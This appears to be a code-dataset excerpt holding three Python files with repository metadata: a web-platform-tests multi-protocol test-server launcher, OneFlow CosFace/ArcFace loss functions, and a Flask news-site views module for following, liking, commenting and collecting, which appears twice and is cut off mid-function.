url_base = file_url[0:file_url.rfind("/") + 1]
self.mountpoint_routes[file_url] = [("GET", file_url, handlers.FileHandler(base_path=base_path, url_base=url_base))]
def get_route_builder(aliases, config=None):
builder = RoutesBuilder()
for alias in aliases:
url = alias["url-path"]
directory = alias["local-dir"]
if not url.startswith("/") or len(directory) == 0:
logger.error("\"url-path\" value must start with '/'.")
continue
if url.endswith("/"):
builder.add_mount_point(url, directory)
else:
builder.add_file_mount_point(url, directory)
return builder
class ServerProc(object):
def __init__(self, scheme=None):
self.proc = None
self.daemon = None
self.stop = Event()
self.scheme = scheme
def start(self, init_func, host, port, paths, routes, bind_address, config, **kwargs):
self.proc = Process(target=self.create_daemon,
args=(init_func, host, port, paths, routes, bind_address,
config),
name='%s on port %s' % (self.scheme, port),
kwargs=kwargs)
self.proc.daemon = True
self.proc.start()
def create_daemon(self, init_func, host, port, paths, routes, bind_address,
config, **kwargs):
try:
self.daemon = init_func(host, port, paths, routes, bind_address, config, **kwargs)
except socket.error:
logger.critical("Socket error on port %s" % port, file=sys.stderr)
raise
except Exception:
logger.critical(traceback.format_exc())
raise
if self.daemon:
try:
self.daemon.start(block=False)
try:
self.stop.wait()
except KeyboardInterrupt:
pass
except Exception:
print(traceback.format_exc(), file=sys.stderr)
raise
def wait(self):
self.stop.set()
self.proc.join()
def kill(self):
self.stop.set()
self.proc.terminate()
self.proc.join()
def is_alive(self):
return self.proc.is_alive()
def check_subdomains(config, routes):
paths = config.paths
bind_address = config.bind_address
host = config.server_host
port = get_port()
logger.debug("Going to use port %d to check subdomains" % port)
wrapper = ServerProc()
wrapper.start(start_http_server, host, port, paths, routes,
bind_address, config)
url = "http://{}:{}/".format(host, port)
connected = False
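# Poll the freshly started server for up to ~10 seconds before concluding
# that it is unreachable.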
for i in range(10):
try:
urllib.request.urlopen(url)
connected = True
break
except urllib.error.URLError:
time.sleep(1)
if not connected:
logger.critical("Failed to connect to test server "
"on {}. {}".format(url, EDIT_HOSTS_HELP))
sys.exit(1)
for domain in config.domains_set:
if domain == host:
continue
try:
urllib.request.urlopen("http://%s:%d/" % (domain, port))
except Exception:
logger.critical("Failed probing domain {}. {}".format(domain, EDIT_HOSTS_HELP))
sys.exit(1)
wrapper.wait()
def make_hosts_file(config, host):
rv = []
for domain in config.domains_set:
rv.append("%s\t%s\n" % (host, domain))
# Windows interprets the IP address 0.0.0.0 as non-existent, making it an
# appropriate alias for non-existent hosts. However, UNIX-like systems
# interpret the same address to mean any IP address, which is inappropriate
# for this context. These systems do not reserve any value for this
# purpose, so the unavailability of the domains must be taken for granted.
#
# https://github.com/web-platform-tests/wpt/issues/10560
if platform.uname()[0] == "Windows":
for not_domain in config.not_domains_set:
rv.append("0.0.0.0\t%s\n" % not_domain)
return "".join(rv)
def start_servers(host, ports, paths, routes, bind_address, config, **kwargs):
servers = defaultdict(list)
for scheme, ports in ports.items():
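# http and https are expected to expose two ports each (primary plus a
# secondary); every other scheme exposes exactly one.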
assert len(ports) == {"http": 2, "https": 2}.get(scheme, 1)
# If trying to start HTTP/2.0 server, check compatibility
if scheme == 'h2' and not http2_compatible():
logger.error('Cannot start HTTP/2.0 server as the environment is not compatible. ' +
'Requires Python 2.7.10+ (< 3.0) and OpenSSL 1.0.2+')
continue
for port in ports:
if port is None:
continue
init_func = {"http": start_http_server,
"https": start_https_server,
"h2": start_http2_server,
"ws": start_ws_server,
"wss": start_wss_server,
"quic-transport": start_quic_transport_server}[scheme]
server_proc = ServerProc(scheme=scheme)
server_proc.start(init_func, host, port, paths, routes, bind_address,
config, **kwargs)
servers[scheme].append((port, server_proc))
return servers
def startup_failed(log=True):
# log=False is a workaround for https://github.com/web-platform-tests/wpt/issues/22719
if log:
logger.critical(EDIT_HOSTS_HELP)
else:
print("CRITICAL %s" % EDIT_HOSTS_HELP, file=sys.stderr)
sys.exit(1)
def start_http_server(host, port, paths, routes, bind_address, config, **kwargs):
try:
return wptserve.WebTestHttpd(host=host,
port=port,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=False,
key_file=None,
certificate=None,
latency=kwargs.get("latency"))
except Exception:
startup_failed()
def start_https_server(host, port, paths, routes, bind_address, config, **kwargs):
try:
return wptserve.WebTestHttpd(host=host,
port=port,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=True,
key_file=config.ssl_config["key_path"],
certificate=config.ssl_config["cert_path"],
encrypt_after_connect=config.ssl_config["encrypt_after_connect"],
latency=kwargs.get("latency"))
except Exception:
startup_failed()
def start_http2_server(host, port, paths, routes, bind_address, config, **kwargs):
try:
return wptserve.WebTestHttpd(host=host,
port=port,
handler_cls=wptserve.Http2WebTestRequestHandler,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=True,
key_file=config.ssl_config["key_path"],
certificate=config.ssl_config["cert_path"],
encrypt_after_connect=config.ssl_config["encrypt_after_connect"],
latency=kwargs.get("latency"),
http2=True)
except Exception:
startup_failed()
class WebSocketDaemon(object):
def __init__(self, host, port, doc_root, handlers_root, bind_address, ssl_config):
self.host = host
cmd_args = ["-p", port,
"-d", doc_root,
"-w", handlers_root]
if ssl_config is not None:
cmd_args += ["--tls",
"--private-key", ssl_config["key_path"],
"--certificate", ssl_config["cert_path"]]
if bind_address:
cmd_args = ["-H", host] + cmd_args
opts, args = pywebsocket._parse_args_and_config(cmd_args)
opts.cgi_directories = []
opts.is_executable_method = None
self.server = pywebsocket.WebSocketServer(opts)
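# pywebsocket may bind several sockets (e.g. IPv4 and IPv6); all of them must
# have ended up on the same port for self.port to be meaningful.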
ports = [item[0].getsockname()[1] for item in self.server._sockets]
if not ports:
# TODO: Fix the logging configuration in WebSockets processes
# see https://github.com/web-platform-tests/wpt/issues/22719
print("Failed to start websocket server on port %s, "
"is something already using that port?" % port, file=sys.stderr)
raise OSError()
assert all(item == ports[0] for item in ports)
self.port = ports[0]
self.started = False
self.server_thread = None
def start(self, block=False):
self.started = True
if block:
self.server.serve_forever()
else:
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.setDaemon(True) # don't hang on exit
self.server_thread.start()
def stop(self):
"""
Stops the server.
If the server is not running, this method has no effect.
"""
if self.started:
try:
self.server.shutdown()
self.server.server_close()
self.server_thread.join()
self.server_thread = None
except AttributeError:
pass
self.started = False
self.server = None
def release_mozlog_lock():
try:
from mozlog.structuredlog import StructuredLogger
try:
StructuredLogger._lock.release()
except threading.ThreadError:
pass
except ImportError:
pass
def start_ws_server(host, port, paths, routes, bind_address, config, **kwargs):
# Ensure that when we start this in a new process we have the global lock
# in the logging module unlocked
reload_module(logging)
release_mozlog_lock()
try:
return WebSocketDaemon(host,
str(port),
repo_root,
config.paths["ws_doc_root"],
bind_address,
ssl_config=None)
except Exception:
startup_failed(log=False)
def start_wss_server(host, port, paths, routes, bind_address, config, **kwargs):
# Ensure that when we start this in a new process we have the global lock
# in the logging module unlocked
reload_module(logging)
release_mozlog_lock()
try:
return WebSocketDaemon(host,
str(port),
repo_root,
config.paths["ws_doc_root"],
bind_address,
config.ssl_config)
except Exception:
startup_failed(log=False)
class QuicTransportDaemon(object):
def __init__(self, host, port, handlers_path=None, private_key=None, certificate=None, log_level=None):
args = ["python3", "wpt", "serve-quic-transport"]
if host:
args += ["--host", host]
if port:
args += ["--port", str(port)]
if private_key:
args += ["--private-key", private_key]
if certificate:
args += ["--certificate", certificate]
if handlers_path:
args += ["--handlers-path", handlers_path]
if log_level == "debug":
args += ["--verbose"]
self.command = args
self.proc = None
def start(self, block=False):
if block:
subprocess.call(self.command)
else:
def handle_signal(*_):
if self.proc:
try:
self.proc.terminate()
except OSError:
# It's fine if the child already exits.
pass
self.proc.wait()
sys.exit(0)
signal.signal(signal.SIGTERM, handle_signal)
signal.signal(signal.SIGINT, handle_signal)
self.proc = subprocess.Popen(self.command)
# Give the server a second to start and then check.
time.sleep(1)
if self.proc.poll():
sys.exit(1)
def start_quic_transport_server(host, port, paths, routes, bind_address, config, **kwargs):
# Ensure that when we start this in a new process we have the global lock
# in the logging module unlocked
reload_module(logging)
release_mozlog_lock()
try:
return QuicTransportDaemon(host,
port,
private_key=config.ssl_config["key_path"],
certificate=config.ssl_config["cert_path"],
log_level=config.log_level)
except Exception:
startup_failed(log=False)
def start(config, routes, **kwargs):
host = config["server_host"]
ports = config.ports
paths = config.paths
bind_address = config["bind_address"]
logger.debug("Using ports: %r" % ports)
servers = start_servers(host, ports, paths, routes, bind_address, config, **kwargs)
return servers
def iter_procs(servers):
for servers in servers.values():
for port, server in servers:
yield server.proc
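# _make_subdomains_product({"www", "www1"}, depth=2) yields the single names
# plus every dotted pair, e.g. "www.www1" and "www1.www".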
def _make_subdomains_product(s, depth=2):
return {u".".join(x) for x in chain(*(product(s, repeat=i) for i in range(1, depth+1)))}
def _make_origin_policy_subdomains(limit):
return {u"op%d" % x for x in range(1,limit+1)}
_subdomains = {u"www",
u"www1",
u"www2",
u"天気の良い日",
u"élève"}
_not_subdomains = {u"nonexistent"}
_subdomains = _make_subdomains_product(_subdomains)
# Origin policy subdomains need to not be reused by any other tests, since origin policies have
# origin-wide impacts like installing a CSP or Feature Policy that could interfere with features
# under test.
# See https://github.com/web-platform-tests/rfcs/pull/44.
_subdomains |= _make_origin_policy_subdomains(99)
_not_subdomains = _make_subdomains_product(_not_subdomains)
class ConfigBuilder(config.ConfigBuilder):
"""serve config
This subclasses wptserve.config.ConfigBuilder to add serve config options.
"""
_default = {
"browser_host": "web-platform.test",
"alternate_hosts": {
"alt": "not-web-platform.test"
},
"doc_root": repo_root,
"ws_doc_root": os.path.join(repo_root, "websockets", "handlers"),
"server_host": None,
"ports": {
"http": [8000, "auto"],
"https": [8443, 8444],
"ws": ["auto"],
"wss": ["auto"],
},
"check_subdomains": True,
"log_level": "debug",
"bind_address": True,
"ssl": {
"type": "pregenerated",
"encrypt_after_connect": False,
"openssl": {
"openssl_binary": "openssl",
"base_path": "_certs",
"password": "web-platform-tests",
"force_regenerate": False,
"duration": 30,
"base_conf_path": None
},
"pregenerated": {
"host_key_path": os.path.join(repo_root, "tools", "certs", "web-platform.test.key"),
"host_cert_path": os.path.join(repo_root, "tools", "certs", "web-platform.test.pem")
},
"none": {}
},
"aliases": []
}
computed_properties = ["ws_doc_root"] + config.ConfigBuilder.computed_properties
def __init__(self, *args, **kwargs):
if "subdomains" not in kwargs:
kwargs["subdomains"] = _subdomains
if "not_subdomains" not in kwargs:
kwargs["not_subdomains"] = _not_subdomains
super(ConfigBuilder, self).__init__(
*args,
**kwargs
)
with self as c:
browser_host = c.get("browser_host")
alternate_host = c.get("alternate_hosts", {}).get("alt")
if not domains_are_distinct(browser_host, alternate_host):
raise ValueError(
"Alternate host must be distinct from browser host"
)
def _get_ws_doc_root(self, data):
if data["ws_doc_root"] is not None:
return data["ws_doc_root"]
else:
return os.path.join(data["doc_root"], "websockets", "handlers")
def ws_doc_root(self, v):
self._ws_doc_root = v
ws_doc_root = property(None, ws_doc_root)
def _get_paths(self, data):
rv = super(ConfigBuilder, self)._get_paths(data)
rv["ws_doc_root"] = data["ws_doc_root"]
return rv
def build_config(override_path=None, config_cls=ConfigBuilder, **kwargs):
rv = config_cls()
enable_http2 = kwargs.get("h2")
if enable_http2 is None:
enable_http2 = True
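# HTTP/2 defaults to enabled; --no-h2 sets h2=False, skipping the h2 port.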
if enable_http2:
rv._default["ports"]["h2"] = [9000]
if override_path and os.path.exists(override_path):
with open(override_path) as f:
override_obj = json.load(f)
rv.update(override_obj)
if kwargs.get("config_path"):
other_path = os.path.abspath(os.path.expanduser(kwargs.get("config_path")))
if os.path.exists(other_path):
with open(other_path) as f:
override_obj = json.load(f)
rv.update(override_obj)
else:
raise ValueError("Config path %s does not exist" % other_path)
overriding_path_args = [("doc_root", "Document root"),
("ws_doc_root", "WebSockets document root")]
for key, title in overriding_path_args:
value = kwargs.get(key)
if value is None:
continue
value = os.path.abspath(os.path.expanduser(value))
if not os.path.exists(value):
raise ValueError("%s path %s does not exist" % (title, value))
setattr(rv, key, value)
return rv
def get_parser():
parser = argparse.ArgumentParser()
parser.add_argument("--latency", type=int,
help="Artificial latency to add before sending http responses, in ms")
parser.add_argument("--config", action="store", dest="config_path",
help="Path to external config file")
parser.add_argument("--doc_root", action="store", dest="doc_root",
help="Path to document root. Overrides config.")
parser.add_argument("--ws_doc_root", action="store", dest="ws_doc_root",
help="Path to WebSockets document root. Overrides config.")
parser.add_argument("--alias_file", action="store", dest="alias_file",
help="File with entries for aliases/multiple doc roots. In form of `/ALIAS_NAME/, DOC_ROOT\\n`")
parser.add_argument("--h2", action="store_true", dest="h2", default=None,
help=argparse.SUPPRESS)
parser.add_argument("--no-h2", action="store_false", dest="h2", default=None,
help="Disable the HTTP/2.0 server")
parser.add_argument("--quic-transport", action="store_true", help="Enable QUIC server for WebTransport")
parser.add_argument("--exit-after-start", action="store_true", help="Exit after starting servers")
parser.set_defaults(report=False)
parser.set_defaults(is_wave=False)
return parser
def run(config_cls=ConfigBuilder, route_builder=None, **kwargs):
received_signal = threading.Event()
with build_config(os.path.join(repo_root, "config.json"),
config_cls=config_cls,
**kwargs) as config:
global logger
logger = config.logger
set_logger(logger)
# Configure the root logger to cover third-party libraries.
logging.getLogger().setLevel(config.log_level)
def handle_signal(signum, frame):
logger.debug("Received signal %s. Shutting down.", signum)
received_signal.set()
bind_address = config["bind_address"]
if kwargs.get("alias_file"):
with open(kwargs["alias_file"], 'r') as alias_file:
for line in alias_file:
alias, doc_root = [x.strip() for x in line.split(',')]
config["aliases"].append({
'url-path': alias,
'local-dir': doc_root,
})
if route_builder is None:
route_builder = get_route_builder
routes = route_builder(config.aliases, config).get_routes()
if config["check_subdomains"]:
check_subdomains(config, routes)
stash_address = None
if bind_address:
stash_address = (config.server_host, get_port(""))
logger.debug("Going to use port %d for stash" % stash_address[1])
with stash.StashServer(stash_address, authkey=str(uuid.uuid4())):
servers = start(config, routes, **kwargs)
signal.signal(signal.SIGTERM, handle_signal)
signal.signal(signal.SIGINT, handle_signal)
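# Poll until a server process dies, a shutdown signal arrives, or
# --exit-after-start was requested.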
while (all(subproc.is_alive() for subproc in iter_procs(servers)) and
not received_signal.is_set() and not kwargs["exit_after_start"]):
for subproc in iter_procs(servers):
subproc.join(1)
failed_subproc = 0
for subproc in iter_procs(servers):
if subproc.is_alive():
logger.info('Status of subprocess "%s": running' % subproc.name)
else:
if subproc.exitcode == 0:
logger.info('Status of subprocess "%s": exited correctly' % subproc.name)
else:
logger.warning('Status of subprocess "%s": failed. Exited with non-zero status %d' % (subproc.name, subproc.exitcode))
failed_subproc += 1
return failed_subproc
def main():
kwargs = vars(get_parser().parse_args())
return run(**kwargs)
avg_line_length: 35.890533 | max_line_length: 141 | alphanum_fraction: 0.577666
is_comment_constant_removed: true | is_sharp_comment_removed: true
hexsha: 1c44615cab2746c171e94d3955b5d0b53fc86e1b | size: 1,605 | ext: py | lang: Python
repo_path: Vision/oneflow_face/utils/losses.py | repo_name: mls1999725/models | head_hexsha: 77b3a9d727cb7cf3a14a75d8fdb0d17bb411bd02 | licenses: ["Apache-2.0"]
stars: 43 (2021-06-03T09:07:08.000Z .. 2022-03-31T15:21:48.000Z) | issues: 64 (2021-05-31T10:34:06.000Z .. 2022-01-17T03:44:58.000Z) | forks: 37 (2021-07-04T03:13:18.000Z .. 2022-03-25T07:30:47.000Z)
import oneflow as flow
from oneflow import nn
def get_loss(name):
if name == "cosface":
return CosFace()
elif name == "arcface":
return ArcFace()
else:
raise ValueError()
class CrossEntropyLoss_sbp(nn.Module):
def __init__(self):
super(CrossEntropyLoss_sbp, self).__init__()
def forward(self, logits, label):
loss = flow._C.sparse_softmax_cross_entropy(logits, label)
loss = flow.mean(loss)
return loss
class CosFace(nn.Module):
def __init__(self, s=64.0, m=0.40):
super(CosFace, self).__init__()
self.s = s
self.m = m
def forward(self, cosine, label):
index = flow.where(label != -1)[0]
m_hot = flow.zeros(index.size()[0], cosine.size()[1], device=cosine.device)
m_hot = flow.scatter(m_hot, 1, label[index, None], self.m)
cosine = cosine[index] - m_hot
ret = cosine * self.s
return ret
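# CosFace applies an additive margin in cosine space: the target-class logit
# becomes s * (cos(theta) - m) while other classes stay s * cos(theta). Note
# that only the rows selected by `index` (label != -1) are returned.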
class ArcFace(nn.Module):
def __init__(self, s=64.0, m=0.5):
super(ArcFace, self).__init__()
self.s = s
self.m = m
def forward(self, cosine: flow.Tensor, label):
index = flow.where(label != -1)[0]
m_hot = flow.zeros(index.size()[0], cosine.size()[1], device=cosine.device)
m_hot.scatter_(1, label[index, None], self.m)
cosine.acos_()
cosine[index] += m_hot
cosine.cos_().mul_(self.s)
return cosine
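# ArcFace adds the margin to the angle itself: target logits become
# s * cos(theta + m), a stricter penalty near the decision boundary than
# CosFace's cosine-space margin.
# A minimal usage sketch (illustrative; shapes are assumptions):
#     loss_fn = get_loss("arcface")
#     logits = loss_fn(cosine, labels)  # cosine: (N, C) in [-1, 1], labels: (N,)
#     loss = CrossEntropyLoss_sbp()(logits, labels)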
avg_line_length: 25.078125 | max_line_length: 83 | alphanum_fraction: 0.586293
is_comment_constant_removed: true | is_sharp_comment_removed: true
hexsha: 1c44621189b941c48d02923714b5af63f0aad611 | size: 9,678 | ext: py | lang: Python
repo_path: info/modules/news/views.py | repo_name: wangjinyu124419/xinjing | head_hexsha: 205dd890b5d0baeae5935dfe24bd0208808e7e2b | licenses: ["MIT"]
stars: null | issues: null | forks: null
import logging
from flask import abort
from flask import g
from flask import request
from flask import session, jsonify
from info import constants, db
from info import response_code
from info.models import User, News,Comment, CommentLike
from info.utils.comment import user_login_data
from . import blue_news
from flask import render_template
@blue_news.route('/followed_user',methods=['GET','POST'])
@user_login_data
def followed_user():
"""关注和取消关注
1.判断用户是否登录
2.接受参数:user_id, action
3.校验参数:判断参数是否齐全,判断action是否在范围内
4.使用user_id查询要被关注的用户是否存在
5.如果要被关注的用户是存在的,再根据action实现关注和取消关注
6.同步数据库
7.响应结果
"""
# 1.判断用户是否登录: login_user 关注 other
login_user = g.user
if not login_user:
return jsonify(errno=response_code.RET.SESSIONERR, errmsg='用户未登录')
# 2. Accept parameters: user_id, action
user_id = request.json.get('user_id')
action = request.json.get('action')
# 3. Validate parameters: all present and action within the allowed range
if not all([user_id, action]):
return jsonify(errno=response_code.RET.PARAMERR, errmsg='缺少参数')
if action not in ['follow', 'unfollow']:
return jsonify(errno=response_code.RET.PARAMERR, errmsg='参数错误')
# 4. Use user_id to query whether the user to be followed exists: login_user follows other
try:
other = User.query.get(user_id)
except Exception as e:
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='查询用户数据失败')
if not other:
return jsonify(errno=response_code.RET.NODATA, errmsg='被关注的用户不存在')
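# "followed" is a self-referential many-to-many relationship; append/remove
# create or delete the underlying association rows.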
# 5. If the target user exists, follow or unfollow according to action (core logic)
if action == 'follow':
# follow
if other not in login_user.followed:
login_user.followed.append(other)
else:
# unfollow
if other in login_user.followed:
login_user.followed.remove(other)
# 6. Commit the changes to the database
try:
db.session.commit()
except Exception as e:
db.session.rollback()
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='操作失败')
# 7. Return the result
return jsonify(errno=response_code.RET.OK, errmsg='操作成功')
@blue_news.route('/comment_like',methods=['POST'])
@user_login_data
def comment_like():
# 1. Check whether the user is logged in
user=g.user
if not user:
return jsonify(errno=response_code.RET.SESSIONERR, errmsg='用户未登录')
# 2. Accept parameters: news_id, comment_id, action
json_dict = request.json
comment_id = json_dict.get('comment_id')
news_id = json_dict.get('news_id')
action = json_dict.get('action')
# 3. Validate parameters: all present and action within range
if not all([comment_id,action]):
return jsonify(errno=response_code.RET.PARAMERR, errmsg='参数不全')
if action not in ['remove','add']:
return jsonify(errno=response_code.RET.PARAMERR, errmsg='参数错误')
# 4. Query whether the comment exists
try:
comment=Comment.query.get(comment_id)
except Exception as e:
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='查询评论失败')
if not comment:
return jsonify(errno=response_code.RET.DBERR, errmsg='该评论不存在')
# 5. Like or unlike according to action
comment_like_mode = CommentLike.query.filter(CommentLike.comment_id == comment.id,
CommentLike.user_id == user.id).first()
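# An existing row makes "add" idempotent; "remove" only deletes it if present.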
if action=='add':
if not comment_like_mode:
comment_like_mode=CommentLike()
comment_like_mode.user_id=user.id
comment_like_mode.comment_id=comment_id
comment.like_count+=1
db.session.add(comment_like_mode)
else:
if comment_like_mode:
# keep like_count consistent when the like is removed
comment.like_count -= 1
db.session.delete(comment_like_mode)
# 6. Commit to the database
try:
db.session.commit()
except Exception as e:
db.session.rollback()
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='操作失败')
# 7. Return the response
return jsonify(errno=response_code.RET.OK, errmsg='操作成功')
# Post a comment on a news item
@blue_news.route('/news_comment',methods=['POST'])
@user_login_data
def news_comment():
# 1. Check whether the user is logged in
user=g.user
if not user:
return jsonify(errno=response_code.RET.SESSIONERR, errmsg='用户未登录')
# 2. Accept parameters: news_id, comment, parent_id
json_dict=request.json
news_id=json_dict.get('news_id')
comment=json_dict.get('comment')
parent_id=json_dict.get('parent_id' )
# 3. Validate that required parameters are present and that news_id/parent_id are integers
if not all([news_id, comment]):
return jsonify(errno=response_code.RET.PARAMERR, errmsg='参数不全')
# 4. Check whether the news item exists by news_id
try:
news_id=int(news_id)
# Without parent_id this is a comment on the news item; with it, a reply to another comment
if parent_id:
parent_id=int(parent_id)
except Exception as e:
logging.error(e)
return jsonify(errno=response_code.RET.PARAMERR, errmsg='参数不是整数')
try:
news=News.query.get(news_id)
except Exception as e:
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='查询新闻失败')
if not news:
return jsonify(errno=response_code.RET.DBERR, errmsg='新闻不存在')
# 5. Create the Comment model
comment_obj=Comment()
comment_obj.content = comment
comment_obj.user_id=user.id
comment_obj.news_id=news.id
if parent_id:
comment_obj.parent_id=parent_id
# 6. Commit to the database
try:
db.session.add(comment_obj)
db.session.commit()
except Exception as e:
logging.error(e)
db.session.rollback()
return jsonify(errno=response_code.RET.DBERR, errmsg='保存数据失败')
# 7. Return the comment data for the front end to render
return jsonify(errno=response_code.RET.OK, errmsg='评论成功',data=comment_obj.to_dict())
@blue_news.route('/news_collect',methods=['POST'])
@user_login_data
def news_collect():
# 0. Check whether the user is logged in
user=g.user
if not user:
return jsonify(errno=response_code.RET.DBERR, errmsg='查询用户失败')
# 1. Accept parameters: action, news_id
json_dict=request.json
news_id=json_dict.get('news_id')
action=json_dict.get('action')
# 2. Validate parameters: all present and action is 'collect' or 'cancel_collect'
if not all([news_id,action]):
return jsonify(errno=response_code.RET.PARAMERR, errmsg='缺少必传参数')
if action not in ['collect','cancel_collect']:
return jsonify(errno=response_code.RET.PARAMERR, errmsg='缺少必传参数')
# 3. Check whether the news item exists by news_id
try:
news=News.query.get(news_id)
except Exception as e:
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='查询新闻失败')
if not news:
return jsonify(errno=response_code.RET.DBERR, errmsg='新闻不存在')
# 4. Collect or cancel the collection according to action
if action=='collect':
# collect
if news not in user.collection_news:
user.collection_news.append(news)
else:
# cancel collection
if news in user.collection_news:
user.collection_news.remove(news)
# 5. Commit to the database
try:
db.session.commit()
except Exception as e:
logging.error(e)
db.session.rollback()
return jsonify(errno=response_code.RET.DBERR, errmsg='存储数据失败')
# 6. Return the collection result
return jsonify(errno=response_code.RET.OK, errmsg='收藏或取消收藏成功')
@blue_news.route('/detail/<int:news_id>')
def news_detail(news_id):
# 1. Query user info
user_id=session.get('user_id',None)
user=None
if user_id:
try:
user=User.query.get(user_id)
except Exception as e:
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='查询用户失败')
# 2. Query the click ranking
news_clicks=None
try:
news_clicks=News.query.order_by(News.clicks.desc()).limit(constants.CLICK_RANK_MAX_NEWS)
except Exception as e:
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='查询新闻排行失败')
# 3. Query the news detail
news_detail=None
try:
news_detail=News.query.get(news_id)
except Exception as e:
logging.error(e)
abort(404)
# Raise 404; 404s are handled uniformly elsewhere
if not news_detail:
abort(404)
news_detail.clicks+=1
try:
db.session.commit()
except Exception as e:
logging.error(e)
db.session.rollback()
# 4. Check the collection status
is_colletted = False
if user:
if news_detail in user.collection_news:
is_colletted = True
# 5. Query comments for front-end rendering
comments=None
try:
comments=Comment.query.filter(Comment.news_id==news_id).order_by(Comment.create_time.desc()).all()
except Exception as e:
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='查询新闻评论失败')
# 6. Query likes on the current news: find which comments the current user liked
# (guarded so anonymous visitors do not trigger an AttributeError on user.id)
comment_like_id = []
if user:
comment_likes = CommentLike.query.filter(CommentLike.user_id == user.id).all()
comment_like_id = [comment_like.comment_id for comment_like in comment_likes]
comment_dict_list=[]
for comment in comments:
comment_dict=comment.to_dict()
comment_dict['is_like']=False
if comment.id in comment_like_id: # the current user liked this comment
comment_dict['is_like'] = True
comment_dict_list.append(comment_dict)
# 7. Follow status of the news author
is_followed=False
if user and news_detail.user:
if news_detail.user in user.followed:
is_followed = True
context = {
'user': user.to_dict() if user else None,
'news_clicks': news_clicks,
'news_detail':news_detail.to_dict(),
'is_colletted':is_colletted,
'comments':comment_dict_list,
'is_followed':is_followed,
}
return render_template('news/detail.html',context=context)
avg_line_length: 29.238671 | max_line_length: 106 | alphanum_fraction: 0.656851
import logging
from flask import abort
from flask import g
from flask import request
from flask import session, jsonify
from info import constants, db
from info import response_code
from info.models import User, News,Comment, CommentLike
from info.utils.comment import user_login_data
from . import blue_news
from flask import render_template
@blue_news.route('/followed_user',methods=['GET','POST'])
@user_login_data
def followed_user():
login_user = g.user
if not login_user:
return jsonify(errno=response_code.RET.SESSIONERR, errmsg='用户未登录')
user_id = request.json.get('user_id')
action = request.json.get('action')
if not all([user_id, action]):
return jsonify(errno=response_code.RET.PARAMERR, errmsg='缺少参数')
if action not in ['follow', 'unfollow']:
return jsonify(errno=response_code.RET.PARAMERR, errmsg='参数错误')
try:
other = User.query.get(user_id)
except Exception as e:
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='查询用户数据失败')
if not other:
return jsonify(errno=response_code.RET.NODATA, errmsg='被关注的用户不存在')
if action == 'follow':
if other not in login_user.followed:
login_user.followed.append(other)
else:
if other in login_user.followed:
login_user.followed.remove(other)
try:
db.session.commit()
except Exception as e:
db.session.rollback()
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='操作失败')
return jsonify(errno=response_code.RET.OK, errmsg='操作成功')
@blue_news.route('/comment_like',methods=['POST'])
@user_login_data
def comment_like():
user=g.user
if not user:
return jsonify(errno=response_code.RET.SESSIONERR, errmsg='用户未登录')
json_dict = request.json
comment_id = json_dict.get('comment_id')
news_id = json_dict.get('news_id')
action = json_dict.get('action')
if not all([comment_id,action]):
return jsonify(errno=response_code.RET.PARAMERR, errmsg='参数不全')
if action not in ['remove','add']:
return jsonify(errno=response_code.RET.PARAMERR, errmsg='参数错误')
try:
comment=Comment.query.get(comment_id)
except Exception as e:
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='查询评论失败')
if not comment:
return jsonify(errno=response_code.RET.DBERR, errmsg='该评论不存在')
comment_like_mode=None
comment_like_mode = CommentLike.query.filter(CommentLike.comment_id == comment.id,
CommentLike.user_id == user.id).first()
if action=='add':
if not comment_like_mode:
comment_like_mode=CommentLike()
comment_like_mode.user_id=user.id
comment_like_mode.comment_id=comment_id
comment.like_count+=1
db.session.add(comment_like_mode)
else:
if comment_like_mode:
db.session.delete(comment_like_mode)
try:
db.session.commit()
except Exception as e:
db.session.rollback()
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='操作失败')
return jsonify(errno=response_code.RET.OK, errmsg='操作成功')
@blue_news.route('/news_comment',methods=['POST'])
@user_login_data
def news_comment():
user=g.user
if not user:
return jsonify(errno=response_code.RET.SESSIONERR, errmsg='用户未登录')
json_dict=request.json
news_id=json_dict.get('news_id')
comment=json_dict.get('comment')
parent_id=json_dict.get('parent_id' )
if not all([news_id,news_id]):
return jsonify(errno=response_code.RET.PARAMERR, errmsg='参数不全')
try:
news_id=int(news_id)
if parent_id:
parent_id=int(parent_id)
except Exception as e:
logging.error(e)
return jsonify(errno=response_code.RET.PARAMERR, errmsg='参数不是整数')
try:
news=News.query.get(news_id)
except Exception as e:
logging.error(e)
        return jsonify(errno=response_code.RET.DBERR, errmsg='Failed to query news')
if not news:
        return jsonify(errno=response_code.RET.DBERR, errmsg='News does not exist')
comment_obj=Comment()
comment_obj.content = comment
comment_obj.user_id=user.id
comment_obj.news_id=news.id
if parent_id:
comment_obj.parent_id=parent_id
try:
db.session.add(comment_obj)
db.session.commit()
except Exception as e:
logging.error(e)
db.session.rollback()
        return jsonify(errno=response_code.RET.DBERR, errmsg='Failed to save data')
    return jsonify(errno=response_code.RET.OK, errmsg='Comment posted successfully', data=comment_obj.to_dict())
@blue_news.route('/news_collect',methods=['POST'])
@user_login_data
def news_collect():
user=g.user
if not user:
        return jsonify(errno=response_code.RET.SESSIONERR, errmsg='User not logged in')
json_dict=request.json
news_id=json_dict.get('news_id')
action=json_dict.get('action')
if not all([news_id,action]):
        return jsonify(errno=response_code.RET.PARAMERR, errmsg='Missing required parameters')
if action not in ['collect','cancel_collect']:
        return jsonify(errno=response_code.RET.PARAMERR, errmsg='Invalid parameters')
try:
news=News.query.get(news_id)
except Exception as e:
logging.error(e)
        return jsonify(errno=response_code.RET.DBERR, errmsg='Failed to query news')
if not news:
